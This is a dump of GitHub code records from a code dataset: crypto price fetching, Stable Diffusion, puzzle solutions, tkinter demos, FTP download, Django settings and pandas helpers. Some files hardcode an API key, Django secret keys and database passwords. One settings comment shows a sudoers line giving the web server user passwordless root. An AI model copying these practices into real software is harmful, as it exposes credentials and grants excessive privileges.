plt.ylabel(\"Frequency\")\n plt.ylim([0, batch_size])\n plt.show()\n\nif __name__ == '__main__':\n f = np.load('data/states.npz')\n state_params = f['states']\n test_truncations(state_params)\n","repo_name":"lewis-od/QNN","sub_path":"state_classifier/test_truncation.py","file_name":"test_truncation.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"3709424365","text":"import requests\nfrom requests.exceptions import ConnectionError, Timeout, TooManyRedirects\n\n\nmyApiKey = '6632c734-36fa-4a69-821f-8b7e26e3566f'\n\nparams = {\n 'start':'1',\n 'limit':'10',\n 'convert':'USD'\n}\n\nurl = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'\n\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': '{}'.format(myApiKey)\n}\n\n\ntry:\n response = requests.get(url, params=params, headers=headers)\n data = response.json()\n mydata = data['data']\n print(\"Top 10 coins\\n\")\n for coins in mydata:\n print(f\"{coins['name']} | Price: {round(coins['quote']['USD']['price'], 2)} | 24hr change: {round(coins['quote']['USD']['percent_change_24h'], 2)}%\" )\n \nexcept (ConnectionError, Timeout, TooManyRedirects) as e:\n print(e)\n\ninput(\"Press enter to exit.\")\n\n\n","repo_name":"ErickLee85/Python-Projects","sub_path":"Crypto/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71303064040","text":"# Taken from https://github.com/finegrain-ai/refiners\n# LICENSE: MIT\n\nimport os\n\nif __name__ == \"__main__\":\n\n from refiners.foundationals.latent_diffusion import StableDiffusion_1\n from refiners.foundationals.latent_diffusion.lora import LoraWeights\n from refiners.fluxion.utils import load_from_safetensors, manual_seed\n import torch\n\n sd15 = StableDiffusion_1(device=\"cuda\")\n sd15.clip_text_encoder.load_state_dict(load_from_safetensors(\"CLIPTextEncoderL.safetensors\"))\n sd15.lda.load_state_dict(load_from_safetensors(\"lda.safetensors\"))\n sd15.unet.load_state_dict(load_from_safetensors(\"unet.safetensors\"))\n\n # This uses the LoraAdapter internally and takes care to inject it where it should\n lora_weights = LoraWeights(\"pokemon_lora.safetensors\", device=sd15.device)\n lora_weights.patch(sd15, scale=1.0)\n\n x=os.environ.get('CM_REFINERS_PROMPT','')\n prompt = \"a cute cat\" if x=='' else x\n\n with torch.no_grad():\n clip_text_embedding = sd15.compute_text_embedding(prompt)\n\n sd15.set_num_inference_steps(30)\n\n manual_seed(2)\n x = torch.randn(1, 4, 64, 64, device=sd15.device)\n\n output=os.environ['CM_REFINERS_OUTPUT_FILE']\n\n with torch.no_grad():\n for step in sd15.steps:\n x = sd15(\n x,\n step=step,\n clip_text_embedding=clip_text_embedding,\n condition_scale=7.5,\n )\n predicted_image = sd15.lda.decode_latents(x)\n predicted_image.save(output)\n\n exit(0)","repo_name":"cknowledge/cm-reproduce","sub_path":"script/run-refiners-hello-world/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"36923994831","text":"from collections import Counter\n\n\ndef part_1(entries):\n valid = 0\n for mini, maxi, letter, pw in entries:\n if mini <= Counter(pw)[letter] <= maxi:\n valid += 1\n\n return valid\n\n\ndef part_2(entries):\n valid = 0\n for mini, maxi, letter, pw in entries:\n\n if Counter(pw[mini - 1] + pw[maxi - 1])[letter] == 1:\n valid += 1\n\n return valid\n\n\ndef main(puzzle_input_f):\n lines = [l.strip() for l in puzzle_input_f.readlines() if l]\n\n entries = []\n for l in lines:\n rule, letter, pw = l.split(\" \")\n mini, maxi = rule.split(\"-\")\n mini = int(mini)\n maxi = int(maxi)\n\n letter = letter.replace(\":\", \"\")\n entries.append((mini, maxi, letter, pw))\n\n print(\"Part 1: \", part_1(entries))\n print(\"Part 2: \", part_2(entries))\n\n\nif __name__ == \"__main__\":\n import os\n from aocpy import input_cli\n\n base_dir = os.path.dirname(__file__)\n with input_cli(base_dir) as f:\n main(f)\n","repo_name":"eruvanos/2020_AOC","sub_path":"02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17679810076","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\nroot.title('Simple Calculator')\n\ndef show_info():\n\tresponse = messagebox.showinfo(\"Showinfo\", \"Info goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef show_warning():\n\tresponse = messagebox.showwarning(\"Showwarning\", \"Warning goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef show_error():\n\tresponse = messagebox.showerror(\"Showerror\", \"Error goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef ask_question():\n\tresponse = messagebox.askquestion(\"Askquestion\", \"Question goes here\")\n\tif response == \"yes\":\n\t\tLabel(root, text=\"You clicked yes ('yes')\").pack()\n\telif response == \"no\":\n\t\tLabel(root, text=\"You clicked no ('no')\").pack()\n\ndef ask_okcancel():\n\tresponse = messagebox.askokcancel(\"Askokcancel\", \"Question goes here\")\n\tif response == 1:\n\t\tLabel(root, text=\"You clicked ok (1)\").pack()\n\telif response == 0:\n\t\tLabel(root, text=\"You clicked cancel (0)\").pack()\n\ndef ask_yesno():\n\tresponse = messagebox.askyesno(\"Askyesno\", \"Question goes here\")\n\tif response == 1:\n\t\tLabel(root, text=\"You clicked yes (1)\").pack()\n\telif response == 0:\n\t\tLabel(root, text=\"You clicked no (0)\").pack()\n\n\nButton(root, text=\"showinfo\", command=show_info).pack()\nButton(root, text=\"showwarning\", command=show_warning).pack()\nButton(root, text=\"showerror\", command=show_error).pack()\nButton(root, text=\"askquestion\", command=ask_question).pack()\nButton(root, text=\"askokcancel\", command=ask_okcancel).pack()\nButton(root, text=\"askyesno\", command=ask_yesno).pack()\n\n\nroot.mainloop()","repo_name":"DocMcFlop/RocketProject","sub_path":"tests/tkinter_messagebox.py","file_name":"tkinter_messagebox.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33639155051","text":"fr = None\ntry:\n file_name = raw_input(\"enter filename : \")\n #opening file in read mode\n fr = open(file_name)\n lines = fr.readlines()\n balance = float(lines[2])\n no = int(raw_input(\"enter no of persons to divide : \"))\n rs = balance/no\n print(\"rs per person is : %0.2f rs\" %rs)\n print(\"task done\")\nexcept Exception as ex:\n #action code\n print(type(ex), \" : \", ex)\nfinally:\n #code ot release resource\n if fr:\n fr.close()\n print(\"file closed\")\nprint(\"all is well\")\n","repo_name":"kajal241199/PYTraining","sub_path":"finaly/f1.py","file_name":"f1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8105018688","text":"from collections import deque\ndef solution(bridge_length, weight, truck_weights):\n answer = 0\n time = 0\n s = deque()\n tw = deque(truck_weights)\n bw = 0\n \n while len(tw) > 0 or len(s) > 0:\n if len(s) != 0 and s[0][1] == time - bridge_length:\n a, b = s.popleft()\n bw -= a\n if len(tw) != 0 and (bw + tw[0]) <= weight:\n bw += tw[0]\n truck = tw.popleft()\n s.append((truck, time))\n \n time += 1\n return time","repo_name":"jisuncho/Programmers-code","sub_path":"42583.py","file_name":"42583.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9781824884","text":"#!/usr/bin/python3\n\n# Эга программа используется для загрузки файлов из интернета\n# по протоколу ftp\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nimport ftplib\nimport os\nimport socket\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nHOST = 'ftp.byfly.by'\nDIRN = 'ubuntu'\nFILE = 'ls-lR.gz'\n\n\ndef main():\n\ttry:\n\t\tf = ftplib.FTP(HOST)\n\texcept (socket.error, socket.gaierror) as e:\n\t\tprint('ERROR: canot reach \"{}\"'.format(HOST))\n\t\treturn\n\tprint('*** Connected to host \"{}\"'.format(HOST))\n\n\ttry:\n\t\tf.login()\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: canot login anonymously')\n\t\tf.quit()\n\t\treturn\n\tprint('*** Logged in as \"anonymous\"')\n\n\ttry:\n\t\tf.cwd(DIRN)\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: canot CD to \"{}\" folder'.format(DIRN))\n\t\tf.quit()\n\t\treturn\n\tprint('*** Changed to \"{}\" folder'.format(DIRN))\n\n\ttry:\n\t\tloc = open(FILE, 'wb')\n\t\tf.retrbinary('RETR {}'.format(FILE), loc.write)\n\t\tloc.close()\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: canot read file \"{}\" to CWD'.format(FILE))\n\t\tos.unlink(FILE)\n\telse:\n\t\tprint('*** Downloaded \"{}\" to CWD'.format(FILE))\n\n\tf.quit()\n\treturn\n\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nif __name__ == '__main__':\n\tmain()","repo_name":"volitilov/Python_learn","sub_path":"programs/medium_prog/ftp_downloader/ftp_downloader.py","file_name":"ftp_downloader.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9040447442","text":"# -*- coding: utf-8 -*-\nimport os\nPROJECT_ROOT_PATH = os.path.dirname(os.path.abspath(__file__))\nJOIN = os.path.join\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Gustavo Henrique', 'gustavo@gustavohenrique.net'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3'\nDATABASE_NAME = JOIN(PROJECT_ROOT_PATH, 'database.db')\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\nTIME_ZONE = 'America/Sao_Paulo'\nLANGUAGE_CODE = 'pt-br'\nSITE_ID = 1\nUSE_I18N = False\nMEDIA_ROOT = JOIN(PROJECT_ROOT_PATH, 'media')\nMEDIA_URL = '/media/'\nADMIN_MEDIA_PREFIX = '/media/admin/'\nSECRET_KEY = 'alwto1ine4o@qjpe&e@6$@$i*wl+hixjumnh$^+$$3r(hhi53g'\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\nROOT_URLCONF = 'bandcontrol.urls'\nTEMPLATE_DIRS = (\n JOIN(PROJECT_ROOT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n\n 'rede',\n 'cliente',\n)\n\n\"\"\"\nConfiguração do sudo\n\nSudo é um software que permite um usuário executar comandos como root.\nÉ preciso adicionar o usuário que está executando o servidor web no\narquivo /etc/sudoers e definir os comandos que ele pode executar como\nroot.\nAbaixo um exemplo de como configurar o /etc/sudoers\n\n# usuário www-data pode executar qualquer comando como root sem senha\nwww-data ALL=(ALL) NOPASSWD: ALL\n\n# usuário www-data pode executar apenas os comandos iptables, arp e ping\nCmnd_Alias COMANDOS = /usr/sbin/iptables, /usr/sbin/arp, /usr/bin/ping\nwww-data ALL=(ALL) NOPASSWD: COMANDOS\n\"\"\"\n\n# Diretorio contendo os scripts de controle de banda e firewall\nSHELL_SCRIPT_DIR = JOIN(PROJECT_ROOT_PATH, 'scripts')\n\n# Caminho para o arquivo texto\nFIREWALL_TXT_FILE = '%s/pontosderede.txt' % SHELL_SCRIPT_DIR\n\n# Firewall\nFIREWALL_SCRIPT = '%s/firewall' % SHELL_SCRIPT_DIR\n\n# ARP para listar IPs conectados\nARP_COMMAND = '/usr/sbin/arp -n | grep -iv incomplet | grep -iv address | grep -iv eth0 | sort'\n\n","repo_name":"gustavohenrique/bandcontrol","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31089680656","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##\n# bsf_decomp.py: Decomposes binary symplectic matrices into circuits.\n##\n# © 2012 Christopher E. Granade (cgranade@gmail.com) and\n# Ben Criger (bcriger@gmail.com).\n# This file is a part of the QuaEC project.\n# Licensed under the AGPL version 3.\n##\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n##\n\n## IMPORTS ##\nfrom sys import version_info\nif version_info[0] == 3:\n PY3 = True\n from importlib import reload\nelif version_info[0] == 2:\n PY3 = False\nelse:\n raise EnvironmentError(\"sys.version_info refers to a version of \"\n \"Python neither 2 nor 3. This is not permitted. \"\n \"sys.version_info = {}\".format(version_info))\n\nimport itertools\nimport string\nimport numpy as np\n\nif PY3:\n from .exceptions import *\n from . import PauliClass as pc\n from . import CliffordClass as cc\n from . import bsf\n from . import utils as u\nelse:\n from exceptions import *\n import PauliClass as pc\n import CliffordClass as cc\n import bsf\n import utils as u\n\n## FUNCTIONS ##\n\ndef next1(arr):\n idx_1s = np.nonzero(arr)\n if len(idx_1s[0]) == 0:\n return None\n else:\n return np.min(idx_1s)\n\ndef circuit_decomposition_part1(bsm):\n \n left_gateseq = []\n right_gateseq = []\n \n for pivot in range(bsm.nq):\n \n ## PROCEDURE 6.5 ##\n \n # STEP 1. Use left multiplication by H and SWAP to move a 1 to the\n # upper-left corner.\n if bsm[pivot, pivot] != 1:\n # Find which row has the 1 in the pivot column.\n idx_pivot1 = next1(bsm[:, pivot])\n \n # If the length of idx_pivot is 0, then we got the empty list,\n # indicating a rank deficiency.\n if idx_pivot1 is None:\n raise RankDeficientError(\"The input binary symplectic matrix must be full-rank.\")\n \n # If we're still here, then we need to move the 1. We start by moving\n # it to the XX block if needed.\n if idx_pivot1 >= bsm.nq:\n idx_pivot1 -= bsm.nq\n left_gateseq.append((\"H\", idx_pivot1))\n bsm.left_H(idx_pivot1)\n \n # We can now assume that the 1 is in the XX block, so we move it\n # to the right row of that block with a left SWAP.\n if idx_pivot1 != pivot:\n left_gateseq.append((\"SWAP\", pivot, idx_pivot1))\n bsm.left_SWAP(pivot, idx_pivot1)\n\n assert bsm[pivot, pivot] == 1, \"Pivot element not correctly set.\"\n \n # STEP 2. Do column reduction on the pivot column of XX, using left CNOT\n # to elimate any other 1s in that column.\n while True:\n idx_next_1 = next1(bsm.xx[pivot+1:, pivot])\n if idx_next_1 is None:\n break\n else:\n idx_next_1 += pivot + 1\n \n left_gateseq.append((\"CNOT\", pivot, idx_next_1))\n bsm.left_CNOT(pivot, idx_next_1)\n \n \n # STEP 3. Do row reduction on the pivot row of XX, using right CNOT to\n # eliminate any other 1s in that row.\n while True:\n idx_next_1 = next1(bsm.xx[pivot, pivot+1:])\n if idx_next_1 is None:\n break\n else:\n idx_next_1 += pivot + 1\n \n right_gateseq.append((\"CNOT\", idx_next_1, pivot))\n bsm.right_CNOT(idx_next_1, pivot)\n \n \n # STEP 4. Use left multiplication by R_pi/4 and CZ to column eliminate\n # the pivot column of ZX.\n while True:\n idx_next_1 = next1(bsm.zx[:, pivot])\n \n if idx_next_1 is None:\n break \n if idx_next_1 == pivot:\n left_gateseq.append((\"R_pi4\", pivot))\n bsm.left_R_pi4(pivot)\n else:\n left_gateseq.append((\"CZ\", pivot, idx_next_1))\n bsm.left_CZ(pivot, idx_next_1)\n \n # STEPS 5-6. Repeat Steps 1 to 4 for pivot += 1.\n # This is taken care of by the loop above.\n \n # STEP 8.\n bsm.right_H_all()\n # STEP 9. Right multiply by R_pi/4 to eliminate the diagonal of A, right multiply by \n # Since B=C=I, and A is symmetric, we can loop over the lower triangular part and the diagonal:\n\n gateseq_8910=[]\n Hs_on=set([])\n for idx_r in range(bsm.nq):\n if bsm.xx[idx_r,idx_r]==1:\n gateseq_8910.append((\"R_pi4\", idx_r))\n bsm.right_R_pi4(idx_r)\n Hs_on.add(idx_r)\n for idx_c in range(idx_r):\n if bsm.xx[idx_r,idx_c]==1:\n gateseq_8910.append((\"CZ\", idx_c, idx_r))\n bsm.right_CZ(idx_c,idx_r)\n Hs_on.update(set([idx_c,idx_r]))\n\n # STEP 10.\n bsm.right_H_all()\n\n appropriate_Hs=[(\"H\",idx) for idx in list(Hs_on)]\n\n gateseq_8910=appropriate_Hs + gateseq_8910 + appropriate_Hs\n\n right_gateseq += gateseq_8910\n\n # Do a final check that the identity matrix is obtained. This should always\n # be the case, and if it is not, that indicates a pretty serious bug.\n # Note that this check is pretty quick compared to the above procedure, so\n # we are not too worried about the slowdown.\n # Moreover, this check doesn't occur in any inner loops, hopefully.\n if not np.all(bsm._arr == np.eye(2 * bsm.nq)):\n print(bsm._arr)\n raise RuntimeError(\"Internal error in bsf_decomp.py; decomposition did not produce identity.\")\n\n return left_gateseq, right_gateseq\n","repo_name":"cgranade/python-quaec","sub_path":"src/qecc/bsf_decomp.py","file_name":"bsf_decomp.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"24197265886","text":"import pickle\nfrom typing import Union\nimport tkinter as tk\n\n\nclass Ball:\n def __init__(self, canvas: tk.Canvas):\n self.canvas = canvas\n self.canvas_width = self.canvas.winfo_reqwidth()\n self.canvas_height = self.canvas.winfo_reqheight()\n self.radius = 20\n self.x, self.y = 0, 0\n self.vx, self.vy = 0, 0\n self.speed = 0\n self.timer = 0\n self.step = 0.1\n self.id = self.canvas.create_oval(0, 0, 0, 0, fill=None, width=0)\n self.move_history = []\n\n def check_border_collision(self) -> None:\n # top border collision\n if self.y <= self.radius:\n self.vy = abs(self.vy) # set positive speed\n\n # bottom border collision\n elif self.y >= (self.canvas_height - self.radius):\n self.vy = -abs(self.vy) # set negative speed\n\n def move(self, acc: int, step: Union[float, int]) -> None:\n self.check_border_collision()\n\n self.vy += acc * step # increase the speed by the amount of acceleration\n\n x = self.x + self.vx * step # change x coord\n y = self.y + self.vy * step # change y coord\n\n self.canvas.move(self.id, x - self.x, y - self.y) # move ball on delta\n self.x, self.y = x, y # reset self coordinates\n self.move_history.append([self.x, self.y]) # store coordinates into list\n\n def game_over(self) -> bool:\n if self.x >= self.canvas_width + self.radius / 2: # ball crossed the right border\n self.save_history()\n return True\n return False\n\n def save_history(self) -> None:\n with open('logs/move_history.pkl', 'wb') as f:\n pickle.dump(self.move_history, f)\n\n # delete and redraw element\n def draw(self) -> int:\n self.canvas.delete(self.id)\n _id = self.canvas.create_oval(self.x - self.radius / 2,\n self.y - self.radius / 2,\n self.x + self.radius / 2,\n self.y + self.radius / 2, fill=\"white\")\n return _id\n\n\n\n\n\n","repo_name":"yavorich/CatchTheBall","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72907940199","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSECRET_KEY = '@w_4al_o=x@va()uk7+^_3-&v9*h$l$-y2@2=3udo&u&e=u8yf'\n\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nINSTALLED_APPS = [\n 'jet.dashboard',\n 'jet',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.staticfiles',\n 'authentication',\n 'visage',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'icms.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'icms.wsgi.application'\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n 'LOCATION': 'localhost:11211',\n },\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'icms',\n 'USER': 'icms',\n 'PASSWORD': 'icms',\n 'HOST': 'localhost',\n 'PORT': '5432',\n },\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nLANGUAGES = [\n ('en', 'English'),\n ('fa', 'Farsi'),\n]\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nLOCALE_PATHS = [\n os.path.join(BASE_DIR, 'locale'),\n]\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\nJET_THEMES = [\n {\n 'theme': 'default',\n 'color': '#47bac1',\n 'title': 'Default'\n },\n {\n 'theme': 'green',\n 'color': '#44b78b',\n 'title': 'Green'\n },\n {\n 'theme': 'light-green',\n 'color': '#2faa60',\n 'title': 'Light Green'\n },\n {\n 'theme': 'light-violet',\n 'color': '#a464c4',\n 'title': 'Light Violet'\n },\n {\n 'theme': 'light-blue',\n 'color': '#5EADDE',\n 'title': 'Light Blue'\n },\n {\n 'theme': 'light-gray',\n 'color': '#222',\n 'title': 'Light Gray'\n }\n]\n","repo_name":"kahrabian/icms","sub_path":"icms/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71909018600","text":"from django.shortcuts import render\n\n\ndef main_view(request):\n context = {\"russian_text\": 'Здравствуйте, мои дорогие любители английского языка! '\n 'Я рада приветствовать вас на этом сайте. '\n 'Здесь вы можете найти много полезной информации, '\n 'касающейся изучения английского языка и методики его преподавания. '\n 'Есть много бесплатных материалов и тех, которые вы можете купить. '\n 'Я буду счастлива помочь вам улучшить ваши навыки и расширить знания английского языка, '\n 'разнообразить ваши уроки, если вы учитель. '\n 'Оставайтесь на связи и помните – совершенству нет предела!',\n \"english_text\": 'Hello, my dear English lovers! '\n 'I’m glad to welcome you at this site. '\n 'Here you can find much useful information concerning to '\n 'English studying and teaching methodic. '\n 'There are many free materials and those ones you can buy. '\n 'I’ll be happy to help you to improve your skills and widen your knowledge of English, '\n 'to vary your lessons if you’re a teacher. '\n 'Stay tune and remember – the sky is the limit!'\n }\n return render(request, 'main_app/main.html', context)\n","repo_name":"Pol888/my_diploma_web_project","sub_path":"my_diploma_web_project/main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30758240372","text":"#song_result_interface.py\n#Authors: Nick Stapleton\n\n# results = CSVInterface.getSong(title='Song Title From Front End')\n\n# 0 <= len(results) \n\n# ANN_result.py\nresult = {\n # data team\n\t'song_id' : int(),\n\t'title': 'Song Title From Front End',\n\n\t## add more info like year or record label\n\t'metadata': { # for front end team\n\t\t'artist': 'placeholder'\n\t},\n\n\t## get data for ml prediction\n\t'subset': str(), # small, medium, full...\n\t'X': [[]], # the features for the song with matching title, use pd.DataFrame.values\n\t'genre_top': str(), # from tracks.csv\n\n\t# the result of the ml team's prediction\n\t# ml team interface\n\t'prediction': {\n\t\t'result': str(), # the top item of genres\n\t\t'genres': { # list of 16 of genre probabilities sorted by most likely to least likely\n\t\t'threshold': int(), # build a list of threshold length to guarantee it will contain the answer\n\t\t},\n\t\t'score': int() # position the actual genre_top is in the list of prediction.genres\n\t},\n\n\t# back end team\n\t'error': '' # init to empty string. front end team will have to handle: error, 1 result, more than 1 results.\n}\n","repo_name":"nhstaple/ecs-171-music-genre-classifier","sub_path":"Back_End/song_result_interface.py","file_name":"song_result_interface.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"23366220068","text":"import pandas as pd\nimport builtins\nfrom typing import Union, List, Dict\n\n\ndef replace_bad_vals(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Replace newline characters in dataframe\n\n Parameters\n ----------\n df : pd.DataFrame\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n for col in [x for x in df.columns.values if df[x].dtype == \"object\"]:\n rowct = len(\n df[\n (df[col].str.contains(r\"\\n\") == True)\n | (df[col].str.contains(r\"\\r\") == True)\n ]\n )\n if rowct > 0:\n print(f\"Bad values found in {col} -- {rowct}\")\n df[col] = df[col].str.replace(r\"\\r\", \"\", regex=True)\n df[col] = df[col].str.replace(r\"\\n\", \"\", regex=True)\n\n return df\n\n\ndef col_to_datetime(df: pd.DataFrame, col: Union[str, list]) -> pd.DataFrame:\n \"\"\"Format pandas column(s) as datetime\n\n Parameters\n ----------\n df : pd.DataFrame\n col : Union[str, list]\n str or list of str (column names)\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n if isinstance(col, str):\n col = [col]\n\n for c in col:\n df[c] = pd.to_datetime(df[c])\n\n return df\n\n\ndef limit_df_fields(\n df: pd.DataFrame, fields: list, default_cols: dict = None\n) -> pd.DataFrame:\n \"\"\"Standardize fields in dataframe\n\n Parameters\n ----------\n df : pd.DataFrame\n fields : list\n list of fields to keep\n default_cols (dict, optional): dict, default None\n dictionary of columns & default values to add if missing\n ex. `{col:default_val}`\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n cols_to_drop = [col for col in df.columns.values if col not in fields]\n df.drop(columns=cols_to_drop, inplace=True)\n if default_cols:\n for field in [\n (k, v) for k, v in default_cols.items() if k not in df.columns.values\n ]:\n df[field[0]] = field[1]\n print(f\"Added field {field[0]} with default val {field[1]}\")\n df = df[[f for f in fields]]\n return df\n\n\ndef nested_dict_to_df(\n raw_data: Union[List, Dict],\n remove_value_types: list = None,\n df_params: dict = None,\n rename_cols: dict = None,\n delete_fields: list = None,\n index_cols: dict = None,\n rename_patterns: dict = None,\n add_fields: dict = None,\n) -> pd.DataFrame:\n \"\"\"Parses a nested array of dict to a pandas dataframe\n\n Parameters\n ----------\n raw_data : Union[List, Dict]\n remove_value_types (list, optional): list, default None\n types to remove from nested dictionaries ex. `list`\n df_params (dict, optional): dict, default None\n parameters to pass to pd.json_normalize\n https://pandas.pydata.org/docs/reference/api/pandas.json_normalize.html\n rename_cols (dict, optional): dict, default None\n dict of column renames\n ex. `{oldname:newname}`\n delete_fields (list, optional): list, default None\n fields to drop from the df entirely\n index_cols (dict, optional): dict, default None\n list of cols to be considered 'index' -- move to front of order\n rename_patterns (dict, optional): dict, default None\n dictionary of rename_patterns to apply to column names\n ex. `{'dict.col':'col'} would rename dict.col.name to col.name`\n add_fields (dict, optional): dict, default None\n dictionary of columns & default values to add if missing\n ex. `{col:default_val}`\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n if type(df_params) == list:\n df = raw_data.copy()\n for df_param in df_params:\n if type(df) == pd.DataFrame:\n df = df.to_dict(orient=\"records\")\n df = pd.json_normalize(df, **df_param)\n\n elif remove_value_types:\n remove_value_types = [getattr(builtins, x) for x in remove_value_types]\n df = pd.json_normalize(\n [\n {k: v for k, v in d.items() if type(v) not in remove_value_types}\n for d in raw_data\n ],\n **df_params,\n )\n else:\n df = pd.json_normalize(raw_data, **df_params)\n\n if rename_cols:\n df = df.rename(columns=rename_cols)\n\n if add_fields:\n for k, v in add_fields.items():\n df[k] = v\n\n if delete_fields:\n df = df.drop(columns=delete_fields)\n\n if index_cols:\n df = df[\n index_cols + [col for col in df.columns.values if col not in index_cols]\n ]\n if rename_patterns:\n for k, v in rename_patterns.items():\n df = df.rename(columns={k: v})\n\n return 